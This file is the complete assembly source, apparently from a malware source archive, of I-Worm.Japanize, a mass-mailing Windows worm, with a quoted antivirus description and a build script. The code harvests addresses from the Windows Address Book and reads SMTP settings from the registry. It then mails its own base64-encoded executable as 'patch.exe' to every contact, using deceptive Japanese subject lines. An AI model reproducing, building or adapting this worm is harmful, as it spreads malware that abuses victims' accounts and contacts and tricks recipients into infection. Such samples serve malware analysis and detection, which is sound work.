MalwareSourceCode/Win32/I-Worm.Japanize.asm

858 lines
16 KiB
NASM
Raw Normal View History

2020-10-10 03:25:52 +00:00
;;; XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
;;; I-Worm.Japanize
;;; XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
;;;
;;;
;;; This has some bugs.
;;;
;;; Here TrendMicro description:
;;; ******************************************************************
;;; http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=WORM_FBOUND.B&VSect=T
;;; Details:
;;;The details of the email this worm arrives with may be as follows:
;;;
;;;To: <recipient>
;;;Subject: <"Important" or random Japanese text(applicable on Japanese supported platforms)>
;;;Message Body: <blank>
;;;Attachment: patch.exe
;;;
;;;It uses its own SMTP engine and uses the following registry key to retrieve the default SMTP server of the infected system:
;;;HKEY_CURRENT_USER\Software\Microsoft\
;;;Internet Account Manager\Accounts\00000001
;;;
;;;It uses the following registry key to retrieve email addresses from the infected user's Windows Address Book (WAB):
;;;HKEY_CURRENT_USER\Software\Microsoft\WAB\
;;;WAB4Wab File Name = <20>g<pathname of WAB file><3E>h
;;;
;;;The email arrives with the attachment PATCH.EXE. If the email address of its target ;;;user ends with the extension .jp, the worm randomly selects a phrase, from a list of 17 possible Japanese phrases below, and uses one as the subject of the email:
;;;
;;;
;;;The English translation for the above Japanese text are as follows:
;;;Re: the issue that you mentioned
;;;Re: important
;;;Re: long time no see
;;;Re: top secret
;;;Re: Hello
;;;Re: important information
;;;Re: data
;;;the issue that you mentioned
;;;important
;;;long time no see
;;;top secret
;;;hello
;;;important information
;;;data
;;;frog
;;;shit
;;;shit
;;;
;;;Otherwise, it uses the subject <20>gImportant."
;;;
;;;This non-destructive worm does not drop files or create any registry entries. Its propagation depends on the execution of the file attachment in the email.
;;;
;;;The following text strings are found in the worm body:
;;;
;;;<3B>eXXXXXXXXXXXXXXXXXXXXXXX<58>f
;;;<3B>eXXXXX I-Worm.Japanize XXXXX<58>f
;;;<3B>eXXXXXXXXXXXXXXXXXXXXXXX<58>f
;;;
;;;
.586p
.model flat
locals
jumps
;;; some lazy shit
callW macro @@@x
extrn @@@x:proc
call @@@x
endm
ofs equ offset
dwo equ dword ptr
wo equ word ptr
by equ byte ptr
HKEY_CURRENT_USER EQU 80000001h
CRLF equ <13,10>
rdtsc equ <dw 310fh>
AF_INET equ 2
SOCK_STREAM equ 1
FILE_ATTRIBUTE_NORMAL EQU 00000080h
GENERIC_READ EQU 80000000h
GENERIC_WRITE EQU 40000000h
PAGE_READONLY EQU 00000002h
PAGE_READWRITE EQU 00000004h
FILE_MAP_READ EQU 00000004h
OPEN_EXISTING EQU 00000003h
GHND EQU 042h
FILE_SHARE_READ EQU 00000001h
FILE_SHARE_WRITE EQU 00000002h
;;; ----------------------------------------------------------------
.data
hReg dd ?; registry handle
str_SMInternetAccountManager db 'Software\Microsoft\Internet Account Manager',0
str_SMIAccounts db 'Software\Microsoft\Internet Account Manager\Accounts\'
AccountIdx db 9 dup(?); account index
bufsiz_accountidx dd 9; size
str_DMA db 'Default Mail Account',0
str_SMTPNAME db 'SMTP Server',0
str_SMTPEmailAddr db 'SMTP Email Address',0
str_SMWab4 db 'Software\Microsoft\WAB\WAB4\Wab File Name',0
SMTP_Server db 50 dup(?) ; default smtp server
bufsiz_SMTPSERVER dd 50
morons_Mailaddr db 256 dup(?) ; mail address of moron :)
bufsiz_morons_mailaddr dd 256
wab4_path db 260 dup(?); wab file path
bufsiz_wab4_path dd 260
buffer db 1000 dup(?)
hwab4file dd ? ; wab4 file handle
hwab4map dd ? ;
hwab4mapview dd ? ;
myfilename db 260 dup(?) ; handle of myself
hmyfile dd ?
fsize dd ? ; file size
hmemout0 dd ?
ptr_myself dd ?
hmemout dd ? ; globalalloc
ptr_base64buf dd ? ; globallock
target_mailaddr db 48h dup(?) ;
sockaddr_in label byte ;
sin_family dw ?
sin_port dw ?
sin_addr dd ?
sin_zero db 8 dup(?)
len_sockaddr_in = $ - ofs sockaddr_in
sock dd ? ; socket descriptor
recv_buffer db 1024 dup(?) ; recv buffer
jflag dd 0 ; japanese or not
smtp_HELO db 'HELO localhost',CRLF
len_smtp_HELO = $ - ofs smtp_HELO
smtp_MAIL_FROM db 'MAIL FROM: '
len_smtp_MAIL_FROM = $ - ofs smtp_MAIL_FROM
;crlf
smtp_RCPT_TO db 'RCPT TO: '
len_smtp_RCPT_TO = $ - ofs smtp_RCPT_TO
;crlf
smtp_DATA db 'DATA',CRLF
len_smtp_DATA = $ - ofs smtp_DATA
smtp_BODY_FROM db 'FROM: '
len_smtp_BODY_FROM = $ - ofs smtp_BODY_FROM
smtp_BODY_TO db CRLF,'TO: '
len_smtp_BODY_TO = $ - ofs smtp_BODY_TO
smtp_BODY_SUBJECT db CRLF,'SUBJECT: Important',CRLF
len_smtp_BODY_SUBJECT = $ - ofs smtp_BODY_SUBJECT
smtp_DOT_CRLF db '.',CRLF
len_smtp_DOT_CRLF = $ - ofs smtp_DOT_CRLF
smtp_QUIT db 'QUIT',CRLF
len_smtp_QUIT = $ - ofs smtp_QUIT
smtp_crlf db CRLF
smtp_MIME_h db 'MIME-Version: 1.0',CRLF
db 'Content-Type: multipart/mixed; boundary="Boundary-a8dfidaoRadvfuck"',CRLF
db CRLF
db '--Boundary-a8dfidaoRadvfuck',CRLF
db 'Content-Type: text/plain; charset=iso-2022-jp',CRLF
db 'Content-Transfer-Encoding: 7bit',CRLF
db 'Content-Description: Mail message body',CRLF
db CRLF
db CRLF ; text
db CRLF
db '--Boundary-a8dfidaoRadvfuck',CRLF
db 'Content-Type: application/x-msdownload; name="patch.exe"',CRLF
db 'Content-Disposition: attachment; filename="patch.exe"',CRLF
db 'Content-Transfer-Encoding: BASE64',CRLF
db CRLF
len_smtp_MIME_h = $ - ofs smtp_MIME_h
;; base64 body
smtp_MIME_e db CRLF,'--Boundary-a8dfidaoRadvfuck--',CRLF,CRLF
len_smtp_MIME_e = $ - ofs smtp_MIME_e
r_seed dd 10987293h ; random seed
smtp_jsubject_1 db CRLF,'SUBJECT: =?ISO-2022-JP?B?'
len_smtp_jsubject_1 = $ - ofs smtp_jsubject_1
smtp_jsubject_2 db '?=',CRLF
len_smtp_jsubject_2 = $ - ofs smtp_jsubject_2
;;; japanese subjects table
japanese_subjects label byte
dd ofs js_01
dd ofs js_02
dd ofs js_03
dd ofs js_04
dd ofs js_05
dd ofs js_06
dd ofs js_07
dd ofs js_08
dd ofs js_09
dd ofs js_10
dd ofs js_11
dd ofs js_12
dd ofs js_13
dd ofs js_14
dd ofs js_15
dd ofs js_16
dd ofs js_17
num_of_jsub = ($ - ofs japanese_subjects)/4
js_01 db 'GyRCPUVNVxsoQg==',0 ; <20>d<EFBFBD>v
js_02 db 'UmU6GyRCPUVNVxsoQg==',0; Re:<3A>d<EFBFBD>v
js_03 db 'GyRCPUVNVyRKJCpDTiRpJDsbKEI=',0; <20>d<EFBFBD>v<EFBFBD>Ȃ<EFBFBD><C882>m<EFBFBD>
js_04 db 'UmU6GyRCPUVNVyRKJCpDTiRpJDsbKEI=',0; Re:<3A>d<EFBFBD>v<EFBFBD>Ȃ<EFBFBD><C882><EFBFBD><EFBFBD>
js_05 db 'GyRCTmMkTjdvGyhC',0 ; <20><><EFBFBD>̌<EFBFBD>
js_06 db 'UmU6GyRCTmMkTjdvGyhC',0; Re:<3A><><EFBFBD>̌<EFBFBD>
js_07 db 'GyRCJCo1VyQ3JFYkaiRHJDkbKEI=',0; <20><><EFBFBD>v<EFBFBD><76><EFBFBD>Ԃ<EFBFBD><D482>ł<EFBFBD>
js_08 db 'UmU6GyRCJCo1VyQ3JFYkaiRHJDkbKEI=',0; Re:<3A><><EFBFBD>v<EFBFBD><76><EFBFBD>Ԃ<EFBFBD><D482>ł<EFBFBD>
js_09 db 'GyRCJDMkcyRLJEEkTxsoQg==',0; <20><><EFBFBD><EFBFBD><EFBFBD>ɂ<EFBFBD><C982><EFBFBD>
js_10 db 'UmU6GyRCJDMkcyRLJEEkTxsoQg==',0; Re:<3A><><EFBFBD><EFBFBD><EFBFBD>ɂ<EFBFBD><C982><EFBFBD>
js_11 db 'GyRCNktIaxsoQg==',0 ; <20>ɔ<EFBFBD>
js_12 db 'UmU6GyRCNktIaxsoQg==',0; Re:<3A>ɔ<EFBFBD>
js_13 db 'GyRCO3FOQRsoQg==',0 ; <20><><EFBFBD><EFBFBD>
js_14 db 'UmU6GyRCO3FOQRsoQg==',0; Re:<3A><><EFBFBD><EFBFBD>
js_15 db 'GyRCMz8bKEI=',0 ; <20><><EFBFBD>
js_16 db 'GyRCJSYlYxsoQlI=',0 ; <20>E<EFBFBD>\<5C>R
js_17 db 'GyRCJCYkcyQzGyhC',0 ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
.code
start:
callW GetTickCount
mov dwo [r_seed],eax
jmp @@go
;; signature :)
db 'XXXXXXXXXXXXXXXXXXXXXXXXXXX',0
db 'XXXXX I-Worm.Japanize XXXXX',0
db 'XXXXXXXXXXXXXXXXXXXXXXXXXXX',0
@@go:
call get_some_info
push ofs buffer
push 0101h
callW WSAStartup
test eax,eax
jnz exit
call open_wab
test eax,eax
jnz clean_sock
call create_base64enc
call spread
free_mem:
push dwo [ptr_base64buf]
callW GlobalUnlock
push dwo [hmemout]
callW GlobalFree
close_wab4:
push dwo [hwab4file]
push dwo [hwab4map]
push dwo [hwab4mapview]
callW CloseHandle
callW CloseHandle
callW CloseHandle
clean_sock:
callW WSACleanup
exit:
push 0
callW ExitProcess
spread:
;; lifewire ;)
mov esi,dwo [hwab4mapview]
mov ecx,[esi+64h] ; num of addr
jecxz @@exit
add esi,[esi+60h] ; ptr to addr
@@spread_loop:
push ecx
mov eax,esi
cmp by [esi+1],0
jne @@nounicode
push esi
lea edi,target_mailaddr
push edi
push 48h
pop ecx
@@1:
lodsw
stosb
loop @@1
pop eax
pop esi
add esi,20h
@@nounicode:
call spread2
add esi,24h
pop ecx
loop @@spread_loop
@@exit:
ret
spread2:
push esi
mov esi,eax ; now esi=email addr
push 0
push 1
push 2
callW socket
mov dwo [sock],eax
mov wo [sin_family],AF_INET
mov ax,25
xchg al,ah
mov wo [sin_port],ax
push ofs SMTP_Server
callW gethostbyname
test eax,eax
jz @@exit
mov eax,[eax+12]
mov eax,[eax]
mov eax,[eax]
mov dwo [sin_addr],eax
push len_sockaddr_in
lea eax,sockaddr_in
push eax
push dwo [sock]
callW connect
test eax,eax
jnz @@exit
call sendmail
@@exit:
pop esi
ret
;;; ---
;;; reg stuff
get_some_info:
xor ebx,ebx
push ofs hReg
push 1
push ebx
push ofs str_SMInternetAccountManager
push HKEY_CURRENT_USER
callW RegOpenKeyExA
test eax,eax
jnz @@error
push ofs bufsiz_accountidx
push ofs AccountIdx
push ebx
push ebx
push ofs str_DMA
push dwo [hReg]
callW RegQueryValueExA
test eax,eax
jnz @@error
push dwo [hReg]
callW RegCloseKey
push ofs hReg
push 1
push ebx
push ofs str_SMIAccounts
push HKEY_CURRENT_USER
callW RegOpenKeyExA
test eax,eax
jnz @@error
push ofs bufsiz_SMTPSERVER
push ofs SMTP_Server
push ebx
push ebx
push ofs str_SMTPNAME
push dwo [hReg]
callW RegQueryValueExA
test eax,eax
jnz @@error
push ofs bufsiz_morons_mailaddr
push ofs morons_Mailaddr
push ebx
push ebx
push ofs str_SMTPEmailAddr
push dwo [hReg]
callW RegQueryValueExA
test eax,eax
jnz @@error
push dwo [hReg]
callW RegCloseKey
push ofs hReg
push 1
push ebx
push ofs str_SMWab4
push HKEY_CURRENT_USER
callW RegOpenKeyExA
test eax,eax
jnz @@error
push ofs bufsiz_wab4_path
push ofs wab4_path
push ebx
push ebx
push ebx
push dwo [hReg]
callW RegQueryValueExA
test eax,eax
jnz @@error
push dwo [hReg]
callW RegCloseKey
xor eax,eax
ret
@@error:
xor eax,eax
dec eax
ret
open_wab:
xor ebx,ebx
push ebx
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push ebx
push FILE_SHARE_WRITE
push GENERIC_READ
push ofs wab4_path
callW CreateFileA
inc eax
jz @@error
dec eax
mov dwo [hwab4file],eax
push ebx
push ebx
push ebx
push PAGE_READONLY
push ebx
push eax
callW CreateFileMappingA
mov dwo [hwab4map],eax
push ebx
push ebx
push ebx
push FILE_MAP_READ
push eax
callW MapViewOfFile
mov dwo [hwab4mapview],eax
xor eax,eax
ret
@@error:
xor eax,eax
dec eax
ret
create_base64enc:
push 260
push ofs myfilename
push 0
callW GetModuleFileNameA
xor ebx,ebx
push ebx
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push ebx
push FILE_SHARE_READ
push GENERIC_READ
push ofs myfilename
callW CreateFileA
inc eax
jz @@error
dec eax
mov dwo [hmyfile],eax
push 0
push dwo [hmyfile]
callW GetFileSize
mov dwo [fsize],eax
add eax,100h
push eax
push GHND
callW GlobalAlloc
mov dwo [hmemout0],eax
push eax
callW GlobalLock
mov dwo [ptr_myself],eax
push 0
push ofs recv_buffer
push dwo [fsize]
push eax
push dwo [hmyfile]
callW ReadFile
test eax,eax
jz @@eexit
push 0
push dwo [hmyfile]
callW GetFileSize
push eax ; save size
shl eax,1 ; eax*2
push eax
push GHND
callW GlobalAlloc
mov dwo [hmemout],eax
push eax
callW GlobalLock
mov dwo [ptr_base64buf],eax
; pop ebx ; restore size
; push ebx ; size
push eax
push dwo [ptr_myself]
call base64encode
push dwo [hmyfile]
callW CloseHandle
push dwo [ptr_myself]
callW GlobalUnlock
push dwo [hmemout0]
callW GlobalFree
xor eax,eax
ret
@@eexit:
push dwo [hmyfile]
callW CloseHandle
push dwo [ptr_myself]
callW GlobalUnlock
push dwo [hmemout0]
callW GlobalFree
@@error:
xor eax,eax
dec eax
ret
base64encode proc pascal
arg @@src
arg @@dest
arg @@srclen
mov esi,dwo [@@src]
mov edi,dwo [@@dest]
@@b64loop:
xor eax,eax
cmp dwo [@@srclen],1
jne @@srclen2
lodsb
push 2
pop ecx
mov edx,03D3Dh ; ==
dec dwo [@@srclen]
jmp @@b64next
@@srclen2:
cmp dwo [@@srclen],2
jne @@srclen3
lodsw
push 3
pop ecx
push 03dh
pop edx
sub dwo [@@srclen],2
jmp @@b64next
@@srclen3:
lodsd
push 4
pop ecx
xor edx,edx
dec esi
sub dwo [@@srclen],3
@@b64next:
bswap eax
@@b64n_loop:
mov ebx,eax
and eax,0FC000000h
rol eax,6
mov al,[@@b64table + eax]
stosb
mov eax,ebx
shl eax,6
dec ecx
jnz @@b64n_loop
cmp dwo [@@srclen],0
ja @@b64loop
mov eax,edx
stosd
ret
@@b64table db "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
endp
g_send:
;; in
;; ecx = size
;; esi = ptr to data
;; out
;; eax = ret value of send()
push 0
push ecx
push esi
push dwo [sock]
callW send
ret
g_recv:
;; out
;; error -> eax=-1 success -> eax = 0
@@again:
push 0
push 1024
push ofs recv_buffer
push dwo [sock]
callW recv
inc eax
jz @@recv_error
cmp eax,1024
jz @@again
xor eax,eax
ret
@@recv_error:
xor eax,eax
dec eax
ret
sendmail:
;; yea. lame routine ;)
push esi ; mail addr
mov dwo [jflag],0 ; flag for .jp
;;
call g_recv
;;
lea esi,smtp_HELO
mov ecx,len_smtp_HELO
call g_send
call g_recv
;;
lea esi,smtp_MAIL_FROM
mov ecx,len_smtp_MAIL_FROM
call g_send
push ofs morons_Mailaddr
callW lstrlen
mov ecx,eax
lea esi,morons_Mailaddr
call g_send
mov ecx,2
lea esi,smtp_crlf
call g_send
call g_recv
;;
mov ecx,len_smtp_RCPT_TO
lea esi,smtp_RCPT_TO
call g_send
pop esi
push esi
push esi
callW lstrlen
push eax ; save
mov ecx,eax
call g_send
mov ecx,2
lea esi,smtp_crlf
call g_send
call g_recv
;; .jp?
pop eax ; len of mail address
pop esi
push esi ; mail address
add esi,eax
sub esi,3
cmp dwo [esi],00706a2eh ; .jp?
jne @@1
inc dwo [jflag]
@@1:
;;
lea esi,smtp_DATA
mov ecx,len_smtp_DATA
call g_send
call g_recv
;;
lea esi,smtp_BODY_FROM
mov ecx,len_smtp_BODY_FROM
call g_send
push ofs morons_Mailaddr
callW lstrlen
mov ecx,eax
lea esi,morons_Mailaddr
call g_send
lea esi,smtp_BODY_TO
mov ecx,len_smtp_BODY_TO
call g_send
pop esi
push esi
push esi
callW lstrlen
mov ecx,eax
call g_send
cmp dwo [jflag],0
jnz @@jsubject
mov ecx,len_smtp_BODY_SUBJECT
lea esi,smtp_BODY_SUBJECT
call g_send
jmp @@body
@@jsubject:
;; gen subject
mov ecx,len_smtp_jsubject_1
lea esi,smtp_jsubject_1
call g_send
mov esi,(num_of_jsub-1)
call rng
lea esi,japanese_subjects
mov esi,dwo [esi+eax*4]
push esi
callW lstrlen
mov ecx,eax
call g_send
mov ecx,len_smtp_jsubject_2
lea esi,smtp_jsubject_2
call g_send
@@body:
lea esi,smtp_MIME_h
mov ecx,len_smtp_MIME_h
call g_send
mov esi,dwo [ptr_base64buf]
push esi
push esi
callW lstrlen
pop esi
mov ecx,eax
call g_send
lea esi,smtp_MIME_e
mov ecx,len_smtp_MIME_e
call g_send
mov ecx,len_smtp_DOT_CRLF
lea esi,smtp_DOT_CRLF
call g_send
call g_recv
;;
mov ecx,len_smtp_QUIT
lea esi,smtp_QUIT
call g_send
call g_recv
pop esi
ret
rng:
;; in
;; esi = range
;; out
;; eax = random number
rdtsc
xor eax,edx
imul eax,dwo [r_seed]
dec eax
mov dwo [r_seed],eax
xor edx,edx
div esi
mov eax,edx
ret
end start
*************************************************************************
@ECHO OFF
TASM32 /ml /m /z japanize.asm,japanize.obj
TLINK32 -x -aa -Tpe japanize.obj,,,%import32.lib
DEL *.OBJ